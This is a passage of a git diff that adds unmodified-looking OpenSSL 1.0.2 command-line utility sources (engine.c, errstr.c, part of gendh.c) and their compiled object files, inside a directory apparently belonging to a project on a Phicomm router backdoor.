zKl>;74M<Nne>#?kjMzUIaQ@`Lp~}xk2q9hB$h&Z2LdcizxA^s@84h#)3xJvD4j}f(
eHTVg?Wm=5CNM#IPAJXL?l=bgcLU}g#|9=B7R#`&;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.c
new file mode 100644
index 0000000..3d70cac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.c
@@ -0,0 +1,517 @@
+/* apps/engine.c -*- mode: C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte <richard@levitte.org> for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+#include "apps.h"
+#include <openssl/err.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+# include <openssl/ssl.h>
+
+# undef PROG
+# define PROG    engine_main
+
+static const char *engine_usage[] = {
+    "usage: engine opts [engine ...]\n",
+    " -v[v[v[v]]] - verbose mode, for each engine, list its 'control commands'\n",
+    "               -vv will additionally display each command's description\n",
+    "               -vvv will also add the input flags for each command\n",
+    "               -vvvv will also show internal input flags\n",
+    " -c          - for each engine, also list the capabilities\n",
+    " -t[t]       - for each engine, check that they are really available\n",
+    "               -tt will display error trace for unavailable engines\n",
+    " -pre <cmd>  - runs command 'cmd' against the ENGINE before any attempts\n",
+    "               to load it (if -t is used)\n",
+    " -post <cmd> - runs command 'cmd' against the ENGINE after loading it\n",
+    "               (only used if -t is also provided)\n",
+    " NB: -pre and -post will be applied to all ENGINEs supplied on the command\n",
+    " line, or all supported ENGINEs if none are specified.\n",
+    " Eg. '-pre \"SO_PATH:/lib/libdriver.so\"' calls command \"SO_PATH\" with\n",
+    " argument \"/lib/libdriver.so\".\n",
+    NULL
+};
+
+static void identity(char *ptr)
+{
+    return;
+}
+
+static int append_buf(char **buf, const char *s, int *size, int step)
+{
+    int l = strlen(s);
+
+    if (*buf == NULL) {
+        *size = step;
+        *buf = OPENSSL_malloc(*size);
+        if (*buf == NULL)
+            return 0;
+        **buf = '\0';
+    }
+
+    if (**buf != '\0')
+        l += 2;                 /* ", " */
+
+    if (strlen(*buf) + strlen(s) >= (unsigned int)*size) {
+        *size += step;
+        *buf = OPENSSL_realloc(*buf, *size);
+    }
+
+    if (*buf == NULL)
+        return 0;
+
+    if (**buf != '\0')
+        BUF_strlcat(*buf, ", ", *size);
+    BUF_strlcat(*buf, s, *size);
+
+    return 1;
+}
+
+static int util_flags(BIO *bio_out, unsigned int flags, const char *indent)
+{
+    int started = 0, err = 0;
+    /* Indent before displaying input flags */
+    BIO_printf(bio_out, "%s%s(input flags): ", indent, indent);
+    if (flags == 0) {
+        BIO_printf(bio_out, "<no flags>\n");
+        return 1;
+    }
+    /*
+     * If the object is internal, mark it in a way that shows instead of
+     * having it part of all the other flags, even if it really is.
+     */
+    if (flags & ENGINE_CMD_FLAG_INTERNAL) {
+        BIO_printf(bio_out, "[Internal] ");
+    }
+
+    if (flags & ENGINE_CMD_FLAG_NUMERIC) {
+        BIO_printf(bio_out, "NUMERIC");
+        started = 1;
+    }
+    /*
+     * Now we check that no combinations of the mutually exclusive NUMERIC,
+     * STRING, and NO_INPUT flags have been used. Future flags that can be
+     * OR'd together with these would need to added after these to preserve
+     * the testing logic.
+     */
+    if (flags & ENGINE_CMD_FLAG_STRING) {
+        if (started) {
+            BIO_printf(bio_out, "|");
+            err = 1;
+        }
+        BIO_printf(bio_out, "STRING");
+        started = 1;
+    }
+    if (flags & ENGINE_CMD_FLAG_NO_INPUT) {
+        if (started) {
+            BIO_printf(bio_out, "|");
+            err = 1;
+        }
+        BIO_printf(bio_out, "NO_INPUT");
+        started = 1;
+    }
+    /* Check for unknown flags */
+    flags = flags & ~ENGINE_CMD_FLAG_NUMERIC &
+        ~ENGINE_CMD_FLAG_STRING &
+        ~ENGINE_CMD_FLAG_NO_INPUT & ~ENGINE_CMD_FLAG_INTERNAL;
+    if (flags) {
+        if (started)
+            BIO_printf(bio_out, "|");
+        BIO_printf(bio_out, "<0x%04X>", flags);
+    }
+    if (err)
+        BIO_printf(bio_out, "  <illegal flags!>");
+    BIO_printf(bio_out, "\n");
+    return 1;
+}
+
+static int util_verbose(ENGINE *e, int verbose, BIO *bio_out,
+                        const char *indent)
+{
+    static const int line_wrap = 78;
+    int num;
+    int ret = 0;
+    char *name = NULL;
+    char *desc = NULL;
+    int flags;
+    int xpos = 0;
+    STACK_OF(OPENSSL_STRING) *cmds = NULL;
+    if (!ENGINE_ctrl(e, ENGINE_CTRL_HAS_CTRL_FUNCTION, 0, NULL, NULL) ||
+        ((num = ENGINE_ctrl(e, ENGINE_CTRL_GET_FIRST_CMD_TYPE,
+                            0, NULL, NULL)) <= 0)) {
+# if 0
+        BIO_printf(bio_out, "%s<no control commands>\n", indent);
+# endif
+        return 1;
+    }
+
+    cmds = sk_OPENSSL_STRING_new_null();
+
+    if (!cmds)
+        goto err;
+    do {
+        int len;
+        /* Get the command input flags */
+        if ((flags = ENGINE_ctrl(e, ENGINE_CTRL_GET_CMD_FLAGS, num,
+                                 NULL, NULL)) < 0)
+            goto err;
+        if (!(flags & ENGINE_CMD_FLAG_INTERNAL) || verbose >= 4) {
+            /* Get the command name */
+            if ((len = ENGINE_ctrl(e, ENGINE_CTRL_GET_NAME_LEN_FROM_CMD, num,
+                                   NULL, NULL)) <= 0)
+                goto err;
+            if ((name = OPENSSL_malloc(len + 1)) == NULL)
+                goto err;
+            if (ENGINE_ctrl(e, ENGINE_CTRL_GET_NAME_FROM_CMD, num, name,
+                            NULL) <= 0)
+                goto err;
+            /* Get the command description */
+            if ((len = ENGINE_ctrl(e, ENGINE_CTRL_GET_DESC_LEN_FROM_CMD, num,
+                                   NULL, NULL)) < 0)
+                goto err;
+            if (len > 0) {
+                if ((desc = OPENSSL_malloc(len + 1)) == NULL)
+                    goto err;
+                if (ENGINE_ctrl(e, ENGINE_CTRL_GET_DESC_FROM_CMD, num, desc,
+                                NULL) <= 0)
+                    goto err;
+            }
+            /* Now decide on the output */
+            if (xpos == 0)
+                /* Do an indent */
+                xpos = BIO_puts(bio_out, indent);
+            else
+                /* Otherwise prepend a ", " */
+                xpos += BIO_printf(bio_out, ", ");
+            if (verbose == 1) {
+                /*
+                 * We're just listing names, comma-delimited
+                 */
+                if ((xpos > (int)strlen(indent)) &&
+                    (xpos + (int)strlen(name) > line_wrap)) {
+                    BIO_printf(bio_out, "\n");
+                    xpos = BIO_puts(bio_out, indent);
+                }
+                xpos += BIO_printf(bio_out, "%s", name);
+            } else {
+                /* We're listing names plus descriptions */
+                BIO_printf(bio_out, "%s: %s\n", name,
+                           (desc == NULL) ? "<no description>" : desc);
+                /* ... and sometimes input flags */
+                if ((verbose >= 3) && !util_flags(bio_out, flags, indent))
+                    goto err;
+                xpos = 0;
+            }
+        }
+        OPENSSL_free(name);
+        name = NULL;
+        if (desc) {
+            OPENSSL_free(desc);
+            desc = NULL;
+        }
+        /* Move to the next command */
+        num = ENGINE_ctrl(e, ENGINE_CTRL_GET_NEXT_CMD_TYPE, num, NULL, NULL);
+    } while (num > 0);
+    if (xpos > 0)
+        BIO_printf(bio_out, "\n");
+    ret = 1;
+ err:
+    if (cmds)
+        sk_OPENSSL_STRING_pop_free(cmds, identity);
+    if (name)
+        OPENSSL_free(name);
+    if (desc)
+        OPENSSL_free(desc);
+    return ret;
+}
+
+static void util_do_cmds(ENGINE *e, STACK_OF(OPENSSL_STRING) *cmds,
+                         BIO *bio_out, const char *indent)
+{
+    int loop, res, num = sk_OPENSSL_STRING_num(cmds);
+
+    if (num < 0) {
+        BIO_printf(bio_out, "[Error]: internal stack error\n");
+        return;
+    }
+    for (loop = 0; loop < num; loop++) {
+        char buf[256];
+        const char *cmd, *arg;
+        cmd = sk_OPENSSL_STRING_value(cmds, loop);
+        res = 1;                /* assume success */
+        /* Check if this command has no ":arg" */
+        if ((arg = strstr(cmd, ":")) == NULL) {
+            if (!ENGINE_ctrl_cmd_string(e, cmd, NULL, 0))
+                res = 0;
+        } else {
+            if ((int)(arg - cmd) > 254) {
+                BIO_printf(bio_out, "[Error]: command name too long\n");
+                return;
+            }
+            memcpy(buf, cmd, (int)(arg - cmd));
+            buf[arg - cmd] = '\0';
+            arg++;              /* Move past the ":" */
+            /* Call the command with the argument */
+            if (!ENGINE_ctrl_cmd_string(e, buf, arg, 0))
+                res = 0;
+        }
+        if (res)
+            BIO_printf(bio_out, "[Success]: %s\n", cmd);
+        else {
+            BIO_printf(bio_out, "[Failure]: %s\n", cmd);
+            ERR_print_errors(bio_out);
+        }
+    }
+}
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int ret = 1, i;
+    const char **pp;
+    int verbose = 0, list_cap = 0, test_avail = 0, test_avail_noise = 0;
+    ENGINE *e;
+    STACK_OF(OPENSSL_STRING) *engines = sk_OPENSSL_STRING_new_null();
+    STACK_OF(OPENSSL_STRING) *pre_cmds = sk_OPENSSL_STRING_new_null();
+    STACK_OF(OPENSSL_STRING) *post_cmds = sk_OPENSSL_STRING_new_null();
+    int badops = 1;
+    BIO *bio_out = NULL;
+    const char *indent = "     ";
+
+    apps_startup();
+    SSL_load_error_strings();
+
+    if (bio_err == NULL)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+    bio_out = BIO_new_fp(stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+    {
+        BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+        bio_out = BIO_push(tmpbio, bio_out);
+    }
+# endif
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strncmp(*argv, "-v", 2) == 0) {
+            if (strspn(*argv + 1, "v") < strlen(*argv + 1))
+                goto skip_arg_loop;
+            if ((verbose = strlen(*argv + 1)) > 4)
+                goto skip_arg_loop;
+        } else if (strcmp(*argv, "-c") == 0)
+            list_cap = 1;
+        else if (strncmp(*argv, "-t", 2) == 0) {
+            test_avail = 1;
+            if (strspn(*argv + 1, "t") < strlen(*argv + 1))
+                goto skip_arg_loop;
+            if ((test_avail_noise = strlen(*argv + 1) - 1) > 1)
+                goto skip_arg_loop;
+        } else if (strcmp(*argv, "-pre") == 0) {
+            argc--;
+            argv++;
+            if (argc == 0)
+                goto skip_arg_loop;
+            sk_OPENSSL_STRING_push(pre_cmds, *argv);
+        } else if (strcmp(*argv, "-post") == 0) {
+            argc--;
+            argv++;
+            if (argc == 0)
+                goto skip_arg_loop;
+            sk_OPENSSL_STRING_push(post_cmds, *argv);
+        } else if ((strncmp(*argv, "-h", 2) == 0) ||
+                   (strcmp(*argv, "-?") == 0))
+            goto skip_arg_loop;
+        else
+            sk_OPENSSL_STRING_push(engines, *argv);
+        argc--;
+        argv++;
+    }
+    /* Looks like everything went OK */
+    badops = 0;
+ skip_arg_loop:
+
+    if (badops) {
+        for (pp = engine_usage; (*pp != NULL); pp++)
+            BIO_printf(bio_err, "%s", *pp);
+        goto end;
+    }
+
+    if (sk_OPENSSL_STRING_num(engines) == 0) {
+        for (e = ENGINE_get_first(); e != NULL; e = ENGINE_get_next(e)) {
+            sk_OPENSSL_STRING_push(engines, (char *)ENGINE_get_id(e));
+        }
+    }
+
+    for (i = 0; i < sk_OPENSSL_STRING_num(engines); i++) {
+        const char *id = sk_OPENSSL_STRING_value(engines, i);
+        if ((e = ENGINE_by_id(id)) != NULL) {
+            const char *name = ENGINE_get_name(e);
+            /*
+             * Do "id" first, then "name". Easier to auto-parse.
+             */
+            BIO_printf(bio_out, "(%s) %s\n", id, name);
+            util_do_cmds(e, pre_cmds, bio_out, indent);
+            if (strcmp(ENGINE_get_id(e), id) != 0) {
+                BIO_printf(bio_out, "Loaded: (%s) %s\n",
+                           ENGINE_get_id(e), ENGINE_get_name(e));
+            }
+            if (list_cap) {
+                int cap_size = 256;
+                char *cap_buf = NULL;
+                int k, n;
+                const int *nids;
+                ENGINE_CIPHERS_PTR fn_c;
+                ENGINE_DIGESTS_PTR fn_d;
+                ENGINE_PKEY_METHS_PTR fn_pk;
+
+                if (ENGINE_get_RSA(e) != NULL
+                    && !append_buf(&cap_buf, "RSA", &cap_size, 256))
+                    goto end;
+                if (ENGINE_get_DSA(e) != NULL
+                    && !append_buf(&cap_buf, "DSA", &cap_size, 256))
+                    goto end;
+                if (ENGINE_get_DH(e) != NULL
+                    && !append_buf(&cap_buf, "DH", &cap_size, 256))
+                    goto end;
+                if (ENGINE_get_RAND(e) != NULL
+                    && !append_buf(&cap_buf, "RAND", &cap_size, 256))
+                    goto end;
+
+                fn_c = ENGINE_get_ciphers(e);
+                if (!fn_c)
+                    goto skip_ciphers;
+                n = fn_c(e, NULL, &nids, 0);
+                for (k = 0; k < n; ++k)
+                    if (!append_buf(&cap_buf,
+                                    OBJ_nid2sn(nids[k]), &cap_size, 256))
+                        goto end;
+
+ skip_ciphers:
+                fn_d = ENGINE_get_digests(e);
+                if (!fn_d)
+                    goto skip_digests;
+                n = fn_d(e, NULL, &nids, 0);
+                for (k = 0; k < n; ++k)
+                    if (!append_buf(&cap_buf,
+                                    OBJ_nid2sn(nids[k]), &cap_size, 256))
+                        goto end;
+
+ skip_digests:
+                fn_pk = ENGINE_get_pkey_meths(e);
+                if (!fn_pk)
+                    goto skip_pmeths;
+                n = fn_pk(e, NULL, &nids, 0);
+                for (k = 0; k < n; ++k)
+                    if (!append_buf(&cap_buf,
+                                    OBJ_nid2sn(nids[k]), &cap_size, 256))
+                        goto end;
+ skip_pmeths:
+                if (cap_buf && (*cap_buf != '\0'))
+                    BIO_printf(bio_out, " [%s]\n", cap_buf);
+
+                OPENSSL_free(cap_buf);
+            }
+            if (test_avail) {
+                BIO_printf(bio_out, "%s", indent);
+                if (ENGINE_init(e)) {
+                    BIO_printf(bio_out, "[ available ]\n");
+                    util_do_cmds(e, post_cmds, bio_out, indent);
+                    ENGINE_finish(e);
+                } else {
+                    BIO_printf(bio_out, "[ unavailable ]\n");
+                    if (test_avail_noise)
+                        ERR_print_errors_fp(stdout);
+                    ERR_clear_error();
+                }
+            }
+            if ((verbose > 0) && !util_verbose(e, verbose, bio_out, indent))
+                goto end;
+            ENGINE_free(e);
+        } else
+            ERR_print_errors(bio_err);
+    }
+
+    ret = 0;
+ end:
+
+    ERR_print_errors(bio_err);
+    sk_OPENSSL_STRING_pop_free(engines, identity);
+    sk_OPENSSL_STRING_pop_free(pre_cmds, identity);
+    sk_OPENSSL_STRING_pop_free(post_cmds, identity);
+    if (bio_out != NULL)
+        BIO_free_all(bio_out);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+#else
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/engine.o
new file mode 100644
index 0000000000000000000000000000000000000000..ecba8a96e4ce0500de286cb8003b51f715b467c0
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ES5JBqyu_1=c1is}^dNy!dlB(c5N}BgRZ2D?*?_(1U-0L6>|gR1
z=uEPU%O>^Efyvu>``+wi(|(NZZaa<xIvluxze=+JUk2${v=2Sl0vHd6*Y4pYEQKuH
zD}Khk{@}8#%E9}o$G!8Tny!0w5w<bcFvs^3=m0E;W0?O19p8oTpEeC^otS!J_m*Hw
zPGi+nO#_4VCW#Egi5d}$>8pr&1i*`VB7+c7<~6?Pm5kpc@aI4Vz{8>d9;HbV3*<y9
zV~!WoFJutSR6P|X&+;^jb2)DuxEisCHo8;$&HN?pjL%;w_VG!a{oVX(xB0OB2PoOZ
zT-ASqUh3&#n&GSB*d%eS&)0ZiaHe!-7RFlpG&RD-2B!TB%ap)XsDa+q4C-flY5!A+
p77EFylc-(A<3F!)ceM4O2JI=G27CS;+_3MSv`<R-sErD3|1TZ;IMM(B

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.c
new file mode 100644
index 0000000..c2d4fde
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.c
@@ -0,0 +1,121 @@
+/* apps/errstr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/lhash.h>
+#include <openssl/err.h>
+#include <openssl/ssl.h>
+
+#undef PROG
+#define PROG    errstr_main
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int i, ret = 0;
+    char buf[256];
+    unsigned long l;
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    SSL_load_error_strings();
+
+    if ((argc > 1) && (strcmp(argv[1], "-stats") == 0)) {
+        BIO *out = NULL;
+
+        out = BIO_new(BIO_s_file());
+        if ((out != NULL) && BIO_set_fp(out, stdout, BIO_NOCLOSE)) {
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                out = BIO_push(tmpbio, out);
+            }
+#endif
+            lh_ERR_STRING_DATA_node_stats_bio(ERR_get_string_table(), out);
+            lh_ERR_STRING_DATA_stats_bio(ERR_get_string_table(), out);
+            lh_ERR_STRING_DATA_node_usage_stats_bio(ERR_get_string_table(),
+                                                    out);
+        }
+        if (out != NULL)
+            BIO_free_all(out);
+        argc--;
+        argv++;
+    }
+
+    for (i = 1; i < argc; i++) {
+        if (sscanf(argv[i], "%lx", &l)) {
+            ERR_error_string_n(l, buf, sizeof buf);
+            printf("%s\n", buf);
+        } else {
+            printf("%s: bad error code\n", argv[i]);
+            printf("usage: errstr [-stats] <errno> ...\n");
+            ret++;
+        }
+    }
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/errstr.o
new file mode 100644
index 0000000000000000000000000000000000000000..a2c05a1e667f9b4b34b50bc6d837d8174b546b94
GIT binary patch
literal 3640
zcmbuBO>Epm6vy9YlV%C66AFYtp|~i4P+GH_6p=)wT5p=fkyfPSg8(J9yt_`aWU~&o
zS4~@~s0u||EoloEE*v-_#2r+Luu=&<z#-zwr4k1!Qa&qDsf`rgvuE0gvlbFOX*@H(
z`M)>g8T;Aq45SC^A`##gfg^CQ$0@*<P50VKubBi1cEQc&y|>j#^;LC39aqa6U+==P
zi7~BwbA_U4=WeuNozp7y9i7xKzuO)|kf>g#7~0ZHR6(iB@0PE!x`C)xzN($Cx~*D;
zg2Lq%ysW&17f<9}1`@xjOB<2q3x6TjDraKa@(bAV73ZrZD-d^;0*<kOi66XZIE}Bu
zp*Yk3#^Jy9wes(tMBV&eTe=eaif$SgHC+B#?Y(hU*D8nC6V-J2_SSW|G7hw-m)-W*
zW!mj@`EM^ux_ry4*Y|0aL+jeIw>ycdy1DAF!v}tQb9Mb=t>SNIPV4sf*KP0z&wWGN
zezbi3_>}slI;Eaa^(zM**Ki%^C@eyU(<f()oNU^*Wy@JBXEs5}F=os@LXK<8$9?sb
zd>BE|IwC8I0x;Cy-zRrYWJ*Q1B=;)aO8j8r#gf-eob8G$@k7u07@!_Ef)0#Ma_Hp=
zr~{}Hi((;r$gd!BdK4myEs;Gt8)KJfE090V#y+Fn9F$rv)}^Gj3(=G$FW0A}&i5OJ
zrTBY0RH<jFaYS0Hi=K=~Jx8UuDs`d+r75W;CB;~fkcvXr!=IbAhNCs#09rd={Z_B2
zceh&^^`hS0*W!)ap{K9C=qTK`P4B;s-g~lTtl8@|KyU_szZ>BGEoy*Anf}QDr*0H>
zY@>UT>=yRNJ0oQKvCw%3Es3BO9}3|kA^eRHo(bXk5N?O?atOZ^!aoY(pNH_35dK{V
z|0#t35yEeU@FslFYwdq?2yYGH;3ozp3re~_PL~8-y6Do)2K9L(Uj%(9J(5z>`pDqm
z*uc0xuBOrhIym{6qEUcM-qJA=q=rXyN1x6YOs`oqPlDs-_(;~Z3otg8)(e)ABfVwo
zn3eLy83$!{c7B1>R>_5d(NTTIblIrx8X1gOnAMAz(-309({V~7TRPsbm+=HnYnrxA
zQ#T3)aGb1Boc7|2^Xo-eC}9>|z{R-Jpp$!cPS4KH>C;BO0MLu)K*sam#-?vcj{@aE
zcmT^C#x=%CzZ(nJ9~1b40-t1@$Km>Efz!Lrd5Lj~|FFPM3%pg}A2LqyDeLe!^t_W%
zoJX*5{t33pg6sd(#~v5g{{`a|zYPnI^R1v4*SRKe%2izdqre{%_%(rx`gMWt5%lyv
zk<t1^{T+|`oW4hV-Y9)I&`AFT7S8uGPWMH*ne*obJ>^c$hXqc#m-ANyE(`pG5T9~5
z*Ut+2eFC=x{Z4_qf?gK*2LgXe;G`j=`=WB!6z9}DzHXr43+dOhyk(mOLvhVT7nGdg
z8lYqx2Nc_)4#^V==8mj2KW`RMQnXxC!CwUW<H*jj{!Fo?EZEk9X}hP;l>(Zx_;woe
z=G_(iuZE1?bj!gnToM@>|E~ExU(4H6(=$ZRKoW~+$JmE=jcpd470tuH?DWi&J&lEU
z@Q>mbb`GQwEr<``AjSNz{t5J@m|a*z<MXFPh;2SUuak_$1G)q3zMl(l?#Jt4<{yy3
zB=Zk)?#KD-*r2Tr%3otZ=0aBU{pa{?Y*5Ug{~`mkT*&I6Kc@Pc=P&y|W?pV1S2};n
zquigLf33Mme~rzrv4f>|SE}JpF@tB12s+sV{Y+rP0$uMLRLj4It^W)K6D;We4=FTX
A!T<mO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.c
new file mode 100644
index 0000000..fef6f1b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/gendh.c
@@ -0,0 +1,248 @@
+/* apps/gendh.c */
+/* obsoleted by dhparam.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
